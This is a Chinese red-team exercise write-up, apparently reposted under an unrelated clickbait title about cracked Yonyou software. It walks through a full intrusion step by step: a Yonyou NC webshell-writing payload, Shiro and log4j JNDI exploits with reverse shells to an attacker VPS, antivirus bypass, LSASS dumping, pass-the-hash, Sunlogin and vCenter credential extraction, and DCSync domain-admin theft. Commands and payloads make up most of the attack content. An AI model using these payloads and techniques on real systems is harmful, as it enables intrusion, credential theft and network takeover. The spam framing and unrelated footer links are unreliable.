用友破解版(用友破解版教程)学到了吗
记一次攻防演练实战总结
点击上方[蓝字],关注我们建议大家把公众号“Z2O安全攻防”设为星标,否则可能就看不到啦!因为公众号现在只对常读和星标的公众号才能展示大图推送操作方法:点击右上角的【...】,然后点击【设为星标】即可免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任文章正文0x01 外网打点资产发现多测绘平台搜索https://hunter.qianxin.com/ 。
https://fofa.info/ https://quake.360.cn/
多语法搜索假如某个目标站点为xxxx.com ,我们可以通过不同的语法进行资产搜集,搜集的资产会更全面 这里以fofa为例domain="xxxx.com"host="xxxx.com"header="xxxx.com"
cert="xxxx.com"敏感信息泄露对于学校站点的信息搜集,一般来说外网能拿直接权限的点已经很少了,web应用大多是放在vpn后面,因此能弄到一个vpn账号可以说是事半功倍,这时候可以通过语法对此类信息进行挖掘
常用命令如下:#google语法 site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码 #github *.edu.cn password
在这次攻防演练里,也是幸运找到了某站点VPN的默认口令,使用的是 姓名拼音/12345678 弱口令默认口令对于部分站点,在搭建完成后可能没有更改默认账号密码,这时候可以尝试使用默认账密登录下面列举一些常见的web站点默认口令
账号: admin administrator root user test 密码: admin admin123 123456123 test root对于一些应用广泛的系统,可以通过google语法搜索其默认密码
这里通过sysadmin/1 成功登入泛微后台
nacos/nacos
常见漏洞利用对于多目标的攻防演练,个人比惯把目标子域url搜集好,去重后批量导进去指纹识别工具,如Goby、fofahub从指纹识别结果里筛选出重要资产进行突破,使用已知漏洞或day进行攻击以下为一些批量漏洞利用工具:
https://github.com/Anonymous-ghost/AttackWebFrameworkTools-5.0 https://github.com/d3ckx1/Fvuln https://github.com/W01fh4cker/Serein
框架类的如log4j、shiro、struts2等OA类的如致远、泛微、用友、蓝凌等,这里也是找到了目标的用友nc站点用友nc写shell
访问接口/servlet/~ic/bsh.servlet.BshServlet执行命令
dnslog探测了一下发现不出网,这里直接写入webshell1、首先生成一个哥斯拉的jsp木马,然后进行unicode编码
2、再把输出结果进行url编码
3、payload字段如下,这里写入默认路径为 webapps/nc_web ,实战中灵活应变String keyWord = URLDecoder.decode("xxxxxx(填入生成内容)xxxxxx"
, "utf-8"); BufferedWriter out = newBufferedWriter(newFileWriter("/webapps/nc\_web/test.jsp")); out.
write(keyWord); out.close();这里直接写入哥斯拉马,连接成功
shiro无依赖链利用通过测绘平台找到一个比较偏的资产,直接访问是一个静态页面,但扫描目录后指纹识别一波发现是shiro直接使用shiro_attack_2.2工具开冲,发现有默认key但是无利用链
可能有些人看到这里就放弃了,但这可能会错过一个利用点shiro可以无依赖链利用,感觉有戏尝试一波,相关知识可拜读师傅的文章https://www.le1a.com/posts/a5f4a9e3这里换用其他工具
通过dnslog测试有回显,这里有个注意点:使用 http://dnslog.cn/ 部分站点会拦截,可以换多个dnslog平台测试
dnslog有回显接下来就是拿shell了,这里由于固定思维,之前遇到的都是linux系统,先入为主觉得是Linux,结果没利用成功,一开始以为是防火墙拦截,后面探测了一下目录结构,发现是windows,所以这里payload要改变一下
这里可以通过网站快速生成payload https://x.hacking8.com/java-runtime.htmlLinux:java -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener
88 CommonsBeanutils1 "bash -c {echo,字段}|{base64,-d}|{bash,-i}"字段=bash -i >& /dev/tcp/x.x.x.x/88880>&1
base64后的值 nc -lvp 端口Windows:java -jar JNDIExploit-1.0-SNAPSHOT.jar -i VPS地址 java -cp ysoserial-0.0
.6-SNAPSHOT-1.8.3.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils2 "ldap://VPS地址:1389/Basic/Command/Base64/d2hvYW1p"
d2hvYW1p为命令的base64,这里是执行命令whoami
0x02 内网渗透杀软识别拿到一台机器后,一般先看一下安装了什么安全防护产品tasklist /svc
探测了一下发现安装了360,把之前准备好的bypass360马子扔上去,成功上线
隧道搭建ping了一下发现机器出网,可以上frp搭建反向代理隧道
proxifier配置相应的端口账密便可以进入内网
横向思路1、优先拿运维机器,一般存放着大量的账号密码信息2、其次是集权设备,Vcenter、堡垒机、天擎这些,有day上day,没day寻找其他方法3、有域的情况下,争取拿到域管hash,或者通过已知漏洞拿下域控
横向移动在扫描之前,可以先通过netspy筛选可达的网段再进行扫描https://github.com/shmilylty/netspy
接着上fscan对可达各个C段开扫,追求效率可只扫描22、80、443、445、1433、8080等重点端口由于扫描会引起安全设备告警,因此横向尽可能在一小时内结束,避免入口机器被关机下线,对于拿到的机器可以通过计划任务进行维权,尽可能多拿几台机器保证口子不会掉,拿到机器后继续做信息搜集,网段,机器信息,敏感文件,xshell、navicat密码等常规的这里就不细说了
dump lssas正常没有杀软我们可以通过mimikatz抓取密码但很多时候mimikatz会被拦截,这时候可以通过一些LOLBINS方法dump出来本地解
这里使用的dump64.exe为白程序,位置位于C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\dump64.exe pid c:\\users\\xxx\\Desktop\\out.dmp
测试可过360和火绒
密码复用08机器之前可以抓到明文,抓不到明文可以尝试到cmd5上进行破解,破解率较高https://www.cmd5.comhttps://www.somd5.com获取密码之后可以通过超级弱口令工具进行密码复用爆破,拿着获取的密码重新组合字典,对网段内的机器进行爆破,这次也是成功拿下了几十台机器
若hash解不出来,这时候我们可以根据开放的端口进行PTH,下面列举一些wmiexec 135端口 psexec 445端口 evil-winrm 5985端口向日葵读取密码拿到机器的账号密码之后,若机器开启了3389端口可以选择rdp远程桌面过去,没开的话可以开启3389端口进行远程连接
#执行以下命令操作注册表来开启机器3389远程桌面服务 REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG\_DWORD /d
00000000 /f #使用以下命令添加防火墙放行策略 netsh firewall add portopening protocol = TCP port = 3389 name = rdp
但如果是正常办公时间,贸然登录过去会很容易引起对方的发现,若进程中有sunlogin进程,可以读取识别码和验证码,通过向日葵连接相对比较隐蔽
注册表读取配置信息:reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginInfo reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginGreenInfo
向日葵默认配置文件路径: 安装版:C:\\Program Files\\Oray\\SunLogin\\SunloginClient\\config.ini 便携版:C:\\ProgramData\\Oray\\SunloginClient\\config.ini
本机验证码参数:encry\_pwd 本机识别码参数:fastcode(去掉开头字母) sunlogincode:判断用户是否登录状态读注册表:
读默认配置文件:fastcode去掉前面的数字k为本机识别码278263893
使用脚本进行解密获得本机验证码
运维机横向的时候优先拿运维机,一般运维机存储着大量的账号密码信息,比如这次无意中发现的运维机器使用的是弱口令administrator/111111另外还可以通过cs插件查看机器历史登录IP对运维人员进行锁定
拿下后可通过命令行快速收集服务器、网络拓扑、密码本、公司信息等重要文件dir /a /s /b d:\\" \*.txt"dir /a /s /b d:\\"\* pass \*"dir /a /s /b d:\\。
"\* login \*"dir /a /s /b d:\\"\* user \*"dir /a /s /b c:\\password.txt dir /a /s /b c:\\\*.conf \*.ini\* .inc\* .config
dir /a /s /b c:\\conf.\* config.\* dir /a /s /b c:\\\*.txt \*.xls\* .xlsx\* .docx | findstr "拓扑"dir /a /s /b c:\\\*.conf \*.ini\* .inc\* .config | findstr
"运维"dir /a /s /b c:\\\*.txt \*.xls\* .xlsx\* .docx | findstr "密码" >C:\\Users\\1.txt 最后收集了一堆密码本,可登录到各重要系统:
H3C堡垒机
禅道
域控1、通过fscan扫描的时候可以检索AD关键字发现域控[*]192.168.10.38#非真实域控ip [->]D1-Prod-AD-P01 [->]192.168.10.38[*]
192.168.10.20#非真实域控ip [->]AD [->]192.168.10.202、域内主机 DNS 一般就是域控地址接着可以通过该机器是否开放53和389端口进行进一步确认
这次攻防演练的其中一个目标,通过密码复用爆破成功的某台机器里,刚好存在着域管进程,提权到system权限后注入到域管进程,通过Dcsync成功获取域管密码的hash值,其中一个被禁用的账户刚好可以通过cmd5解出,解出明文密码并激活账户,成功登录两台域控机器,除此以外还可以尝试域漏洞、NTLM中继等
net group "domain admins" /domain dcsync domain xxxx shell net user xxxx shell net user xxxx /active:yes /domain
Vcenter在扫描的过程中发现几台Vcenter,Vcenter常规有三种打法,分别是CVE-2021-22005-rce、CVE-2021-21972-rce和log4j前两个测试没成功,log4j通过dnslog探测漏洞存在,vcenter的漏洞触发点在xff头部
java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1389 -p 8889 -i 0.0.0.0nc -lvp 9000${jndi:ldap://VPSIP:1389/Deserialization/CommonsBeanutils1/ReverseShell/VPSIP/9000}
但一般打完是非交互式shell,没有回显,这里使用命令切换为交互式shellpython -c import pty;pty.spawn(/bin/bash)重置密码/usr/lib/vmware-vmdir/bin/vdcadmintool
不重置密码获取密码https://github.com/shmilylty/vhost_password_decrypt#获取vc用户的密码 cat /etc/vmware-vpx/vcdb.properties
#把加密后的密码单独拿出来, psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip\_address,user\_name,password from vpx\_host;"
> password.enc #改成这种格式\* H8BBiGe3kQqaujz3ptZvzhWXXZ0M6QOoOFIKL0p0cUDkWF/iMwikwt7BCrfEDRnXCqxoju4t2fsRV3xNMg==\*
zR20RvimwMPHz7U6LJW+GnmLod9pdHpdhIFO+Ooqk0/pn2NGDuKRae+ysy3rxBdwepRzNLdq6+paOgi54Q==\* Q81OIBXziWr0orka0j++PKMSgw6f7kC0lCmITzSlbl/jCDTuRSs07oQnNFpSCC6IhZoPPto5ix0SccQPDw==\*
R6HqZzojKrFeshDIP8vXPMhN28mLDHiEEBSXWYXNHrQQvHcuLOFlLquI2oLRfqLiPlHwkmAxUj9hKj3VZA== #拿解密key cat /etc/vmware-vpx/ssl/symkey.dat
Windows:C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\ssl\\symkey.dat Linux:/etc/vmware-vpx/ssl/symkey.dat
#破解 python decrypt.py symkey.dat password.enc pass.txt然后就可以登入web控制台了
云管平台通过运维机的xshell查找历史记录拿下了主备数据库,然后执行sql语句成功获取出了云管平台的hash
到cmd5上进行解密,一块钱拿下云管平台很划算
但某些系统加密方式不是使用md5的,比如之前碰到的一些系统使用的是Bcrypt加密方式,像这种不可逆的加密方式可以通过替换hash进行登录$2a$10$z0hHT9rltH59VvcazrSzOuVDNr05shwja1aZmD8ctzDbuNNvdpNIS
官网当我们拿到集权设备后,一般里面会有靶标系统或核心系统,这些分数是很高的,这次演练某目标就是通过云管平台登录官网机器,抓取浏览器密码成功获取后台密码,成功拿下官网控制权
gitlab仓库根据评分规则刷完路径分之后,可以根据目标性质找一些核心关键的系统跟裁判battle,像这种存有大量代码的仓库可以作为重大成果进行提交
文章来源:https://forum.butian.net/share/1780技术交流知识星球致力于红蓝对抗,实战攻防,星球不定时更新内外网攻防渗透技巧,以及最新学习研究成果等常态化更新最新安全动态。
专题更新奇技淫巧小Tips及实战案例涉及方向包括Web渗透、免杀绕过、内网攻防、代码审计、应急响应、云安全星球中已发布 300+ 安全资源,针对网络安全成员的普遍水平,并为星友提供了教程、工具、POC&EXP以及各种学习笔记等等。
限时福利,六一嗨翻天,过期就没了哟
交流群关注公众号回复“加群”,添加Z2OBot好友,自动拉你加入Z2O安全攻防交流群(微信群)分享更多好东西。(QQ群可直接扫码添加)
关注我们关注福利:回复“app" 获取 app渗透和app抓包教程回复“渗透字典" 获取 针对一些字典重新划分处理,收集了几个密码管理字典生成器用来扩展更多字典的仓库回复“书籍" 获取 网络安全相关经典书籍电子版pdf。
回复“资料" 获取 网络安全、渗透测试相关资料文档点个【 在看 】,你最好看
- 标签:
- 编辑:李松一
- 相关文章
-
用友破解版(用友破解版教程)深度揭秘
尽管数智化转型已经成为中小企业持续发展的共识,但由于面临资金、技术、人才等要素资源不足,数据安全风险等诸多挑战,大部分中小企业…
-
工商银行金价(工商银行金价回收价格)干货分享
截至6月中旬,工商银行2022年回购业务量同比提升113%。
- 工商银行金价(工商银行金价回收价格)快来看
- 上海税务网上办税服务厅(上海税务计算)速看
- 对账单格式(会计出纳对账单格式)一看就会
- 对账单格式(会计出纳对账单格式)一篇读懂
- 代理报关(代理报关服务属于什么服务)居然可以这样